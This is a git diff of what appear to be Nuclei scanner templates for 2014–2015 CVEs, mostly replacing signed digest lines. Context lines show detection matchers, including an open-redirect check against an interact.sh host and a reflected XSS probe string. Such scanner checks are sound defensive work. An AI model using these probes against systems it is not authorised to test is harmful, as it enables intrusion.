a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fef1c81653b445d6876bb813525f0ad4a8d2f3bce3bf5fac3b7ae67f02ab55c9022100a8189aa1f6dba2f15e80d4fb511041f7e6a5e5921e7e9e82e118a1cb99f33559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c1b42f6c26..c9630b30e8 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201147887d505805312869c53cf391931fb435d6ebb2a345de1298e9952e16582f0221008773ca103f3f110dd79ec2c08eff64ab0ea1d59fa388f1d9470371900fc9f0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 1c6524f68c..a4025a14c3 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d8c11ba1a31ffd7910585875338d74bcd708cd45c0dced1bc16f9ac789f0d3f022100d17f317a0370341a66779fb76b7e4559c2db7104613304dbd1455b6344151bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205aac669d4a5a54dc948c50fd092acac57e7866b919782b44ac4830002791e4c20220754b3c310957be2dcb62fcf22f2dae9be958dd7d837d96fdaae4bab0f1ac0b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 181d9dbb26..6eeb36f740 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b0c4c45a1197068fe3d1c2e791783fc70cbcc9d3206f6e804636e2d200cef0c022100fc157a501cabd7d4201b7164e0daf392f982fa00c7962aa21e21c9b38dbd4618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b52e22b2b25abe5a19f721f332e8bf75bada2eb3d19c315bf4bcae42f83438c702206adca2c25b6c0ea47b913fdf0f2fc8b7c8d803f4a2f7dd210e6fe66dea2b7a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 5beabf687e..b2ad8dcb63 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204632ba857d80985897ff6ed55d02178be53aea7b5bbeeb24fcd6e920d59022ed022100e4aa6568eb57f3a3597613e71186f142e2d44b6a70d5ad43a297aa76e6a2d89b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f574903d83a5801ef1d9545beaaa47d7c0488d0f6557a301e114d7b8bb6943902204dffab422339ed830bd7129f4941e1f0e386dce61aa3fee7d5c6e576a400d675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 8095b8dbc9..cb9287e5f9 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030275d63dbfe56697607c6334a3c8a5811e5cb33d54692005337774bf344cebd022100afc9d9c7a60dabf6c42cb4ed7d333e4e6591ba5fba7baeaaf2b7af52de3126c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a3a6da10e2646e323b0e1402df5a0a8f1f7f1bd7f360285e9ce6c860044ee4f022100ed819ebc2215ceb117a336038a31b1e1403f039b09870e097bcde02e57e05aea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 2bb3fb697b..5819de6277 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055663e58bcf6513417455b0efb0c97cfbac07cc9b0a2f73d2e0d75584454220102205bcd4da9178ae324924159c8150a0ff2df766bc8e7b3ec9b711da13f1de2cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e22cdf6282c4a98b8dd936fe0b27f53880ba1510bcc2635b4ec310f92b090b8022100fa2e5048f8201cb3ff0c7107646d7d7ce231f377f9e085d0b676a185a3c2fa1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index fb2bf85812..ca0f4e8917 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec3f2f4560e6231b16182d21760fdcc4a70b5d2aee0351cfbb9af25a402e2cad022100ba3b535bfbc3654a873212a9181fa6e19aa7a5dd22f2e02ff1fe3e15527b287e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e855f89287ebae2fedab76dbc205d7826f347f223499b7d29ca203da114980e0022100a9d104e9dfde8d776e11958351e829597e081afcab74bfae85f5388768d7a13d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index fca10862e5..74f2b7ba36 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdcfab4922d8796050d75ce54d86d802b84c2037d6d63c97d6389b57ae60133002203a8bde99ea662cc20e306372114e7105ad88ec62a42c7812e0a13c7d085109d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 2e873e82b5..962a5e9d0f 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f41fce0fe4ea55afe08e392d357d518f76a79c6defb6ca8511b388f8f100022a022050e3e10019d9333356dbe6e594d74c2e80530f624096c57c74b70f954cbb276f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index ee93326360..d39748ec44 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffba8f39e1fa9c971f6701509b6aa0b2df388f4e902ae6270d75ccfc573d2a8a0220432aac2c8da61839bf96bcceb0e1e3f10c6cf2755f8c2006d438a53032d4a7ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f262c17c2d38c200c4f64eaff624d6ca4903149a5c9379d1b1de592f06230189022015ccc14685fc5f1018e9399f29d60987d59ed2466775e62810caa949ec8cc514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index cc28a0a534..6c9f4ac9a0 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c77d8dec5838899fb0b5bcaaa704ce03794019ac3eee7ab38c6fc2b89ea7cb802206d118db82dbc520eacf12ac8e3bdd3dace23e753cf0cf2d06c6e23342a0c7273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 59abfcf55b..ec7d0a1987 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220715636195b40ff991c03fdb2384200a99a22e309ab3dc2f6cb3f7a2c6c28719a02206a0582db5e2daabfcb4749bc783bb844f0733b0716db0ee37e9a8e8780fdc9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 5f3cab51ff..57bc690ac5 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100814319b746978b7ca718b8e25ca06acff4cad96360cbdef067269198629865cc02203d59471b74f7036f8c629f2e3a72650ce063c6c2bcf30ed8a1165aad0b4935ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f79db8dff76965b8f3ab5107b55776d293d39132096d384d82363a216e98fc2022100d76092c87bcc34cda20e601f4e6b01bfe01927bded785626ba5a85772fdfcfdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index bf6ac7e08f..3b501be0a0 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012ec28b7ae2fa5ce33f3b849a618ce6d294d4f289985e633959927d2448b8cad022100ece7f22daa65a7bd0eebb32142e90b3ce9f976cade0071f9690cdc7e62bac780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index d6341be61d..1f1d88f537 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220547a737881ebbba547bf355be3f161d38a9bd2f10b8811e29f6958aef12c49ab022100ee951982cbbea4df817b3881a1db7a04abc9cb8ab64d195f5b7f9046ac6d99b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index cfbe7037c3..ab4eeed546 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d63e192fa95e5914ae00c6a2f55a96eef98aeb85eee3f4171b3af2f9d3e52f6d0220578a283149c3a3345f1443cffed1f5bfee0ea458d32f450beabaebe2500f1e4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047b35642f70a3b53211ace11f861e4765249fb4244c05f753ab279f89879e116022100c4a70fe22de8bb7f0a109f44b262232d559cc447faac3c2b2cb095908d770b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index e044328774..326cfe37ed 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210080cd960c9becf8e609afed2036ce9d79e616dceacf52cf5865510c5c1f59220b022100d6ab15602efd08d89ec0f184f8f09651aa1a5b71bbae67567e34933901ec3cc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25f32406e3e481ad9b2f50ea3be976ecd9a39128b79d8d6e6fc08bfddd80bac022100c8d8159a08640e3530b34a713a6f1112f13caa7fbb39ae1c1f45b218af9e2c6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 144c8dfc93..32545626db 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8c58b7ce75987ee10d4a7a2dc87f86c3d65bd50843fac13a7b0d0641c1f20a00220570389114da5233ffcd4ccc05632c183ff57e6dc07babf80b21d2818decee813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index a894613804..fafa68c4cf 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df4d1ce1a9c4a7c7ec1f9f7c4a2dea139740caed42f72b048f16634be7028fcb022040deb4ef640f0efcd128fe37ceaa1b08b48219bddb3695ccbd4789562061356f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 56a54e3022..1e5165fe0c 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 302 -# digest: 4a0a004730450221008ca7c8e2f8971e12c194148bb00ee6af61b7f7402b62a5b0e4b98d020d96eeca0220052a3891b6a4b52003d8e309f5a8c7af3005bbce6e11e69a25f6908273c8bebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f2136d9d8c06c91744feb7dc1c42ffe6f13823841c3487a6844921ceaf142b2022003c2cbb6c9e75bae775fe0fc06e8ee12133e6d53c40b011a5d8b35cac33287ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index cecf244e49..93d5d6b2c2 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022006182b3df441f29283ee673c281717eda7a779b431ecc2f9cb6f9a85fd6dfc88022074682e3692cd0985fdc463c552d02b2315af9ba8dd367b8085661de9f9b79108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201052d6d8b289bb24eb8e28b9777c3fe5d3dba8762e0a7d85949710ac75c87ecc0220548e894c1cd3f8a1cb3c9e71d58c48b458039bb761d70f2f5037e5e1a39f4afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 478b7858c2..1882749a65 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220110e65478297a1f1e19a5e98a5f65f7e6bb674ad23a3824ba952a06b72b3736f02210088cd00b58b916cf718bfd03fd71bfd051e0f737bec255d7752bfbf60ff169f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2c30dafcfaf747bbc1516a801b6f0c0418d72acb0e771939826193d9a93291502204f311d75a2cb0ae12aef112c90a354bd53451d367c99671aed2bd4bd2c4f8621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index e127593c5c..92169aca0b 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f1f475fa4f52e36af22f8c1fd174fd227db3220068dd25993f009d04ecac0700220473d7e9f0bccadbcb97eaac77b5bde7a39bf0a25882afc8889ee9f4996cc1805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index de0b9ca407..5669854804 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0a87139a45778ff044c46bad3780d8ac438f8a75ad5be9dae57584656afba3a022100eac3592c45cd386f902a94e07a5c7915903a6e1bdfd7b5d8a8bdf2af67fbaa38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 966f3227db..4ed01ed159 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d7b2c5ed672ef985ed540bfcbc7c4a97cf1f627eacd0da9ebe8a57297962be402210097c2112afd61ccd9846d28ee66036895ff0f555e75161377c5269319f214284e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 62de6b57dd..0a62a16182 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fcfcc25ab96536af2b8e2b1cae82b3f057a0f60ebf41c8d3f6f4bd029879ef302206acf0ff4e2fd19087e94cb9beb1a8add10fabd4a24597cdf7bd81207a40ae383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index 0251c0c926..a3614de746 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -48,4 +48,4 @@ http: part: header words: - "Microsoft" -# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f63535ff8dd3b0fc92073a3509d0a0fd7a6b3c9d6ed1578186ee18018a502f600220255af0daf50f7a5e4cfb146a9ace9e26de91185c1c8a07724820caba72ac8ac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 237ab86213..4023c545ce 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d3f317fe5b4820f58a1472f22755f24ea4913e7d04c71281acdc16a6ea4dcf102210096e6b0e040652e05835ce91e53d560d472493b09560c17536225a2f257146642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 07927481dd..cf6695e912 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200083eadbbf1f9e019bcd0a93d62e9285ceb5146a095784729a2b8f360e882060022100e7722c672319e299e2e4eda6bbf7ee1e8442c9c123f63aee02d34ad2ea776cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index cee184fae4..892a6b23ea 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b66032656a55663721d240362a3514462a90c3228a98ac576768f9833c27d2022070f821ea45564431e8bea158126f890008c77c8c569bd6a7047652639d07259e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 7c88c23a6d..797b5bbf5b 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ee6af0a974f33dcc7b5fe8f9f4cb703696f43a32588369a8fc83104b162ff3002206ff427f007fb430ad833f19fcc71c4523a959037201b4610e8a5848b66f97a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 34b19334ff..7e901fa40c 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 4172f02203..af2ccb1f13 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dda7ff953b221b559dcea855c1c3673c49450581b89d2b7eb7941894951394fa022100cb6fb992be83baf795c00ba8f2d800eeb418a3a9033cff48b2064f725119f3f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index e106537f6f..d44fdec3f1 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210088a6906ad39a7b6d77f1bf0198de8fc5e3e1f59c7606690649f554952b8e71d5022100b42919235cda07c096a34dce69f2d8ff8b3e19d5f309acbac8bbea3e9140e5fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c5797951db4ec653663bb177b671ce6f66942165295490dbbdcea4c5d0c25f10022061fa0df6b51773e3afe345347fb3bb08f52f14b403d27433a203ae7e0393fd32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 6477f07092..7337ce8150 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082e020d9e8b2d5d7e7bef721183a3753d3d1f6e6d5edac73c48741770d80b66602205d8cf502e70a1a70092bcd7073f6e35af23efdbb2810f7f5d4def6c4926d45b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 4540b128f8..fee2ae86dc 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 